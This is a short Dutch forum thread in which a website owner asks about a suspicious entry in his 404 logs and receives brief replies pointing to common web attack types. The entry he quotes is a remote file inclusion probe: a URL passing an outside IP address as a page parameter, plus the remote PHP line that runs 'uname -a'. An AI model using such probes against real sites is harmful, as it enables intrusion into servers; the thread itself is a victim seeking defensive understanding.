Probeert iemand me nou te hacken?

Pagina: 1
Acties:
  • 45 views sinds 30-01-2008

  • daaan
  • Registratie: Maart 2000
  • Laatst online: 03-12-2025

daaan

Brandweer Zoutkamp

Topicstarter
Ik keek vanmiddag in mijn logs, bij de 404 error's, en ik kom het volgende tegen:

/foto/caravan/tersch/daaan/foto.php?pgnr=http://217.59.104.226/

daar stond een fotoscript.

Ik heb dat IP adres ingevoerd in mijn IE, en kreeg een pagina met alleen dit:

<? echo "\nbl3" . 'bl3 ' ; passthru("uname -a") ; ?>

Waarom zou iemand dit doen, dit is een opdracht om gegevens van het systeem te bemachtigen, of 't lukt, denk het niet.

Ik heb op google gezocht, een paar fora's melden dit ook, maar er is niet echt een antwoord.

Via een whois pagina ben ik er wel achter gekomen waar diegene weg komt (.it), ik heb ook al een abuse mailtje gestuurd met de info.

Maar wat ik graag wil weten, is wat dit is? en waarom iemand dit zou willen?

One's never alone with a rubber duck.


  • P_de_B
  • Registratie: Juli 2003
  • Niet online
offtopic:
Ik denk dat je gewoon aan het werk moet :)

Oops! Google Chrome could not find www.rijks%20museum.nl


  • gorgi_19
  • Registratie: Mei 2002
  • Laatst online: 20:27

gorgi_19

Kruimeltjes zijn weer op :9

Mja, we gaan hier geen hacktopics en mogelijkheden bespreken. :) Hanteer netjes de standaard regels voor goede coding, dan komt het goed. :)

Digitaal onderwijsmateriaal, leermateriaal voor hbo


  • gorgi_19
  • Registratie: Mei 2002
  • Laatst online: 20:27

gorgi_19

Kruimeltjes zijn weer op :9

Anyway, kleine aanvulling. Mocht je willen zoeken op zoekwoorden om het probleem op te lossen, zoek dan naar SQL Injection, Cross Site Scripting Attacks en Includen van bestanden via Querystring. Dit zijn de meest gebruikte aanvalsmogelijkheden in ieder geval.

Digitaal onderwijsmateriaal, leermateriaal voor hbo


Dit topic is gesloten.